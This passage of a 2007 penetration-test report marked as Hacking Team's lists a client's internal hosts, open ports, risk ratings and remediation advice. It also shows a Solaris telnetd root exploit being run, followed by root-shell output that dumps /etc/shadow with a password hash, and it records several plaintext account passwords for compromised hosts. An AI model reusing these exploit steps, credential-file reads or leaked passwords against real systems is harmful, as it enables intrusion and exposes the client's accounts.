Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port: 5900)
5900/tcp open vnc VNC (protocol 3.8)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 128 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IPID Sequence Generation: Incremental
Service Info: OS: Windows
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
6.3.24 192.168.254.140 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows 2000
Hostname MILREPORTDB
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1027/tcp open msrpc Microsoft Windows RPC
1030/tcp open msrpc Microsoft Windows RPC
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.7)
8000/tcp open http-alt?
13782/tcp open VeritasNetbackup?
13783/tcp open vnetd Veritas Netbackup Network Utility
49400/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.7)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 129 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.3.25 192.168.254.159 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSDFEEDDEV
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
199/tcp open smux Linux SNMP multiplexer
631/tcp open ipp CUPS 1.1
2301/tcp open http HP Proliant System Management 2.1.5.146 (CompaqHTTPServer
9.9)
3306/tcp open mysql MySQL (unauthorized)
Uptime: 15.657 days (since Mon Jul 2 14:45:09 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OS: Linux
6.3.26 192.168.254.160 [Safe]
Rating: safe
Vulnerabilities found: none
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 130 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSDFEED1
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
199/tcp open smux Linux SNMP multiplexer
631/tcp open ipp CUPS 1.1
2301/tcp open http HP Proliant System Management 2.1.8.177 (CompaqHTTPServer
9.9)
3306/tcp open mysql MySQL (unauthorized)
Uptime: 40.357 days (since Thu Jun 7 21:57:50 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OS: Linux
6.3.27 192.168.254.162 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 131 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname MTSDFEED3
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
113/tcp open ident authd
199/tcp open smux Linux SNMP multiplexer
2301/tcp open http HP Proliant System Management 2.1.6.156 (CompaqHTTPServer
9.9)
3306/tcp open mysql MySQL (unauthorized)
Uptime: 46.180 days (since Sat Jun 2 02:14:10 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OS: Linux
6.3.28 192.168.254.163 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSDFEED4
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 132 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
199/tcp open smux Linux SNMP multiplexer
631/tcp open ipp CUPS 1.1
2301/tcp open http HP Proliant System Management 2.1.5.146 (CompaqHTTPServer
9.9)
3306/tcp open mysql MySQL (unauthorized)
Uptime: 28.199 days (since Wed Jun 20 01:48:59 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OS: Linux
6.3.29 192.168.254.210 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSINDEXTEST1
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
199/tcp open smux Linux SNMP multiplexer
2301/tcp open http HP Proliant System Management 2.1.7.168 (CompaqHTTPServer
9.9)
Uptime: 25.132 days (since Sat Jun 23 03:33:50 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IPID Sequence Generation: All zeros© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 133 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Service Info: OS: Linux
6.3.30 192.168.254.211 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSINDEXTEST2
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind?
199/tcp open smux?
631/tcp open ipp?
2301/tcp open compaqdiag?
Uptime: 39.944 days (since Fri Jun 8 08:07:35 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IPID Sequence Generation: All zeros
6.3.31 192.168.254.220 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 134 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSINDEX1
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
199/tcp open smux Linux SNMP multiplexer
631/tcp open ipp CUPS 1.1
2301/tcp open http HP Proliant System Management 2.1.5.146 (CompaqHTTPServer
9.9)
Uptime: 31.989 days (since Sat Jun 16 07:04:06 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OS: Linux
6.3.32 192.168.254.221 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSINDEX2
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 135 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
199/tcp open smux Linux SNMP multiplexer
631/tcp open ipp CUPS 1.1
2301/tcp open http HP Proliant System Management 2.1.5.146 (CompaqHTTPServer
9.9)
Uptime: 37.994 days (since Sun Jun 10 06:56:20 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OS: Linux
6.4 Servers in Network 192.168.244.0/24
6.4.1 192.168.244.60 [Compromised]
Rating: compromised
Vulnerabilities found: V5, V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates; disable the cleartext telnet/ftp services or replace them with
telnets/ssh/ftps; disable fingerd service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Solaris 10 6/06
s10s_u2wos_09a SPARC
Hostname BT0247
Compromised Compromised Directly Info Telnet calling login -f
Auth Not needed
The host was alive and these additional information could be extracted:
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 136 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.7+Sun/8.13.7
79/tcp open finger Sun Solaris fingerd
80/tcp open tcpwrapped
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.7+Sun/8.13.7
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
1720/tcp open H.323/Q.931?
3128/tcp open tcpwrapped
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open status 1 (rpc #100024)
32772/tcp open metad 1-2 (rpc #100229)
32773/tcp open mdcommd 1 (rpc #100422)
32774/tcp open rpc.metamedd 1 (rpc #100242)
32775/tcp open metamhd 1 (rpc #100230)
32776/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open rpc
Uptime: 231.325 days (since Thu Dec 7 10:57:33 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=153 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdrappsrv01, mtsdrappsrv01.; OSs: Solaris, Unix
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
The fingerd service is prone to Information Disclosure.
The host has an outdated Solaris version, the supplied telnetd server calls login with unescaped
arguments allowing a remote user to login with any user, root included, without supplying a valid
password:
$ ./scan 192.168.244.60 root
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.244.60...
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 137 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Connected to 192.168.244.60.
Escape character is '^]'.
Last login: Fri Dec 22 12:12:18 from lmeneghesso-lap
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
# bash
root@mtsdrappsrv01 # ps -ef
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 Dec 07 ? 0:18 sched
root 1 0 0 Dec 07 ? 1:04 /sbin/init
root 2 0 0 Dec 07 ? 0:00 pageout
root 3 0 0 Dec 07 ? 1404:05 fsflush
daemon 214 1 0 Dec 07 ? 0:00 /usr/sbin/rpcbind
root 7 1 0 Dec 07 ? 4:51 /lib/svc/bin/svc.startd
root 9 1 0 Dec 07 ? 4:49 /lib/svc/bin/svc.configd
daemon 126 1 0 Dec 07 ? 0:09 /usr/lib/crypto/kcfd
daemon 219 1 0 Dec 07 ? 0:00 /usr/lib/nfs/lockd
root 8720 8715 0 17:32:45 ? 0:00
/usr/openwin/bin/rpc.ttdbserverd
root 25880 1 0 Dec 22 ? 0:00 /usr/lib/ssh/sshd
root 125 1 0 Dec 07 ? 0:00 devfsadmd
root 109 1 0 Dec 07 ? 0:02 /usr/lib/picl/picld
root 210 1 0 Dec 07 ? 0:02 /usr/sbin/cron
root 10295 10293 0 18:17:05 pts/1 0:00 ps -ef
root 114 1 0 Dec 07 ? 0:00 /usr/lib/sysevent/syseventd
root 227 1 0 Dec 07 ? 4:45 /usr/lib/inet/inetd start
daemon 217 1 0 Dec 07 ? 0:00 /usr/lib/nfs/statd
root 229 223 0 Dec 07 ? 0:08 /usr/lib/saf/ttymon
root 223 7 0 Dec 07 ? 0:10 /usr/lib/saf/sac -t 300
root 228 1 0 Dec 07 ? 0:41 /usr/lib/utmpd
root 25915 7 0 Dec 22 console 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T vt100 -m ldterm,ttcompat -
root 10293 10279 0 18:17:02 pts/1 0:00 bash
nobody 8702 227 0 17:32:39 ? 0:00 /usr/openwin/bin/xfs
root 347 1 0 Dec 07 ? 0:24 /usr/sbin/syslogd
root 331 1 0 Dec 07 ? 0:00 /usr/sbin/vold -f
/etc/vold.conf
root 311 1 0 Dec 07 ? 0:00 /usr/lib/autofs/automountd
root 312 311 0 Dec 07 ? 1:25 /usr/lib/autofs/automountd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 138 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 10279 10276 0 18:16:06 pts/1 0:00 -sh
root 369 1 0 Dec 07 ? 5:29 /usr/lib/fm/fmd/fmd
root 345 1 0 Dec 07 ? 0:00 /usr/sbin/mdmonitord
root 384 1 0 Dec 07 ? 10:01 /usr/lib/sendmail -bd -q15m
root 372 227 0 Dec 07 ? 0:00 /usr/sbin/rpc.metad
smmsp 382 1 0 Dec 07 ? 1:13 /usr/lib/sendmail -Ac -q15m
root 574 1 0 Dec 07 ? 0:05 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
root 8722 1 0 17:32:45 ? 1:06 /usr/java/bin/java -Dviper
.fifo.path=/var/run/smc898/boot.fifo -Xmx128m -Dsun.s
root 607 1 0 Dec 07 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 10276 227 0 18:16:06 ? 0:00 /usr/sbin/in.telnetd
root 22798 1 0 Dec 07 ? 10:45 /usr/sbin/nscd
root 8713 227 0 17:32:45 ? 0:00 /usr/sbin/rpc.metamhd
root 8712 227 0 17:32:45 ? 0:00 /usr/sbin/rpc.metamedd
root 585 1 0 Dec 07 ? 0:00 /usr/lib/dmi/dmispd
root 8715 227 0 17:32:45 ? 0:00 /bin/sh /lib/svc/method/rpc-
ttdbserverd
root@mtsdrappsrv01 # cat /etc/shadow
root:gallJRMyHVu36:6445::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
webservd:*LK*:::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
root@mtsdrappsrv01 # ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index
1
inet 127.0.0.1 netmask ff000000
ipge0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 139 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
inet 192.168.244.60 netmask ffffff00 broadcast 192.168.244.255
ether 0:14:4f:2d:73:8e
root@mtsdrappsrv01 # cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
root@mtsdrappsrv01 # getent passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
root@mtsdrappsrv01 # usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
root@mtsdrappsrv01 # cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 140 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Use is subject to license terms.
Assembled 09 June 2006
6.4.2 192.168.244.140 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows 2003 Server
Hostname BT0247
Compromised Compromised Directly Info HP System management
Auth mtsgroup\nwells_a:Summers12
The host was alive and these additional information could be extracted:
80/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1026/tcp open msrpc Microsoft Windows RPC
1720/tcp open H.323/Q.931?
2301/tcp open http HP Proliant System Management 2.1.2.127
(CompaqHTTPServer 9.9)
3128/tcp open tcpwrapped
3389/tcp open microsoft-rdp Microsoft Terminal Service
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Randomized
Service Info: OSs: Windows, Windows 98
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 141 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
It's possible to access the HP System management using a domain or local account and use the
CgiFTP.exe CGI to overwrite arbitrary files and perform local privilege escalation attacks.
6.4.3 192.168.244.160 [Unsafe]
Rating: unsafe
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: disable SSH protocol v1 support and only enable v2
Discovery method Hidden on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux/Solaris Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open tcpwrapped
111/tcp open rpcbind 2 (rpc #100000)
631/tcp open ipp CUPS 1.1
1720/tcp open H.323/Q.931?
3128/tcp open tcpwrapped
Uptime: 32.493 days (since Sun Jun 24 08:10:21 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IPID Sequence Generation: All zeros
The SSH daemon uses an outdated protocol version.
6.4.4 192.168.244.161 [Unsafe]
Rating: unsafe
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 142 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: disable SSH protocol v1 support and only enable v2
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux/Solaris Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open tcpwrapped
111/tcp open rpcbind 2 (rpc #100000)
631/tcp open ipp CUPS 1.1
1720/tcp open H.323/Q.931?
3128/tcp open tcpwrapped
Uptime: 32.469 days (since Sun Jun 24 08:32:31 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IPID Sequence Generation: All zeros
The SSH daemon uses an outdated protocol version.
6.4.5 192.168.244.23 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 143 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Class Server
Vendor/OS Microsoft Windows Version Windows 2003 Server
Hostname MTSDRWINDC1 mtsdrwindc1.mtsgroup.org
Compromise
d
Compromised by Active
Directory
Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
53/tcp open domain Microsoft DNS
80/tcp open tcpwrapped
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1720/tcp open H.323/Q.931?
2301/tcp open http HP Proliant System Management 2.1.2.127
(CompaqHTTPServer 9.9)
3128/tcp open tcpwrapped
3389/tcp open microsoft-rdp Microsoft Terminal Service
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows 98
This host is a Windows Active Directory Domain Controller.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 144 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.4.6 192.168.244.1 [Safe]
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS Checkpoint Version FW1 FireWall-1
Hostname MTSH-FW1_DR-RM
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.6.1p2 (protocol 2.0)
80/tcp open http?
256/tcp open fw1-topology Checkpoint FW1 Topology
257/tcp open fw1-topology Checkpoint FW1 Topology
259/tcp open telnet Check Point FireWall-1 Client Authenticaton
Server
262/tcp open tcpwrapped
264/tcp open fw1-topology Checkpoint FW1 Topology
443/tcp open ssl/http Check Point SVN foundation httpd
500/tcp open isakmp?
900/tcp open http Check Point Firewall-1 Client Authentication
httpd
1720/tcp open H.323/Q.931?
3128/tcp open squid-http?
18183/tcp open fw1-topology Checkpoint FW1 Topology
18184/tcp open fw1-topology Checkpoint FW1 Topology
18187/tcp open fw1-topology Checkpoint FW1 Topology
32773/tcp open ftp Check Point Firewall-1 ftpd
32774/tcp open sometimes-rpc11?
32775/tcp open sometimes-rpc13?
32776/tcp open sometimes-rpc15?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 145 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
32777/tcp open sometimes-rpc17?
32778/tcp open fw1-rlogin Check Point FireWall-1 authenticated RLogin
server (mtsh-fw1_dr-rm)
32779/tcp open smtp
32780/tcp open tcpwrapped
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: Device: firewall
6.5 Servers in Network 192.168.210.0/24
6.5.1 192.168.210.11 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change all default passwords; update firmware to the latest version available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS 3Com Version Superstack 3 switch 4400
Hostname Not detected
Compromi
sed
Compromised Directly Info Weak password
Auth monitor:monitor
The host was alive and these additional information could be extracted:
23/tcp open telnet-ssl telnetd-ssl
80/tcp open http 3Com switch webadmin 1.0
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 146 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
It was possible to login in the administration by tying a default password set.
6.5.2 192.168.210.18 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname REUTERS LONREUTERS
Compromised Compromised Directly Info Microsoft RPC
Auth MTSWriter:t3-st.st.4n-ge
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1029/tcp open msrpc Microsoft Windows RPC
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=121 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
